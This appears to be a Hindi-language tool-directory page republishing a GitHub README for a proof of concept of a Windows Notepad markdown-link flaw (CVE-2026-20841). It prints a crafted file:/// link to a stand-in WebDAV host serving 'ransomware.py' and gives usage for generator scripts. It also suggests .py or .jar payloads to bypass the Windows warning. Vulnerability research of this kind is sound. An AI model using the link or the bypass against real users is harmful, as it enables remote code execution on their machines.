Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-20841 — Windows Notepad RCE के लिए PoC | Kitploit
उपकरण/GitHubGitHub/tangent65536/cve-2026-20841
पेलोड जनरेशनशोषणफिशिंग
GitHubtangent65536/cve-2026-20841

CVE-2026-20841

Windows Notepad RCE के लिए PoC

रिपॉजिटरी देखें
2147 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20841 PoC

"Windows Notepad RCE" भेद्यता का PoC।

अस्वीकरण

  1. मैं वह व्यक्ति नहीं हूँ जिसने इस भेद्यता की खोज की। आधिकारिक प्रकटीकरण पृष्ठ पर सूचीबद्ध मूल लेखकों को श्रेय जाता है। मैंने केवल विवरण के अनुसार PoC को दोबारा बनाया है।
  2. मेरी निजी राय में यह भेद्यता उतनी गंभीर नहीं है जितनी दिखती है। इसे ट्रिगर करने के लिए एक से अधिक क्लिक लगते हैं, जब तक कि लक्ष्य सिस्टम पर कुछ शर्तें पूरी न हों। कृपया मानदंड और सीमाएँ अनुभाग देखें। मैंने यह PoC इसलिए बनाया क्योंकि यह मीम बनाने लायक है। "Notepad RCE" सुनने में बेहद पागलपन भरा लगता है।

विवरण

"भेद्यता" सरल है। Windows Notepad में मार्कडाउन इंजन अस्पष्ट URL प्रोटोकॉल की परवाह नहीं करता। एक मैलवेयर विश्लेषक के रूप में, मैंने WebDAV- और SMB-आधारित पेलोड तैनाती के बारे में कई रिपोर्टें पढ़ी हैं। इस दस्तावेज़ से, कोई भी file:/// प्रोटोकॉल का दुरुपयोग कर सकता है और एक ऐसा URL बना सकता है जो WebDAV/SMB सर्वर पर किसी फ़ाइल की ओर इंगित करता है।

root@kitploit:~
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)

उपयोग

मैंने दो स्क्रिप्ट बनाई हैं। एक Node.js में और दूसरी Python में। दोनों एक मार्कडाउन फ़ाइल बनाती हैं जो WebDAV पेलोड की ओर इंगित करती है। आप sample-payloads फ़ोल्डर में दिए गए उदाहरण पेलोड का उपयोग कर सकते हैं।

Node.js

node poc.js <webdav-server> <port> <payload/path/on/server>

Python

python poc.py <webdav-server> <port> <payload/path/on/server>

आउटपुट (poc.md) वर्तमान निर्देशिका में दिखाई देगा।

मानदंड और सीमाएँ

  1. अधिकांश पेलोड फ़ाइल एक्सटेंशन (जैसे, .exe, .lnk, .vbs, ...) Notepad ऐप के भेद्य होने के बावजूद एक अंतर्निहित चेतावनी ट्रिगर करेंगे। यह चेतावनी Windows की ओर से ही आती है। कम से कम, मेरे द्वारा परीक्षण की गई हर वह चीज़ जो डिफ़ॉल्ट OOB इंस्टॉलेशन पर कोड निष्पादन की ओर ले जा सकती है, अनिवार्य चेतावनी दिखाती है।
    fig01

  2. यदि लक्ष्य डिवाइस पर Python या Java स्थापित है, तो आप चेतावनी पॉप-अप को बायपास करने के लिए .py या .jar पेलोड का उपयोग कर सकते हैं।

पैचिंग के बाद

fig02
अब लिंक पर क्लिक करने पर एक नई पॉप-अप चेतावनी दिखाई देती है।

विविध

आप Uptodown से Windows Notepad का भेद्य संस्करण पा सकते हैं। इंस्टॉलर के डिजिटल हस्ताक्षर की जाँच करना याद रखें और सुनिश्चित करें कि वह Microsoft का है। साथ ही, आपको इस PoC का परीक्षण केवल VM में ही करना चाहिए।

सुरक्षित रहें और मज़े करें!

टूल डाउनलोड करें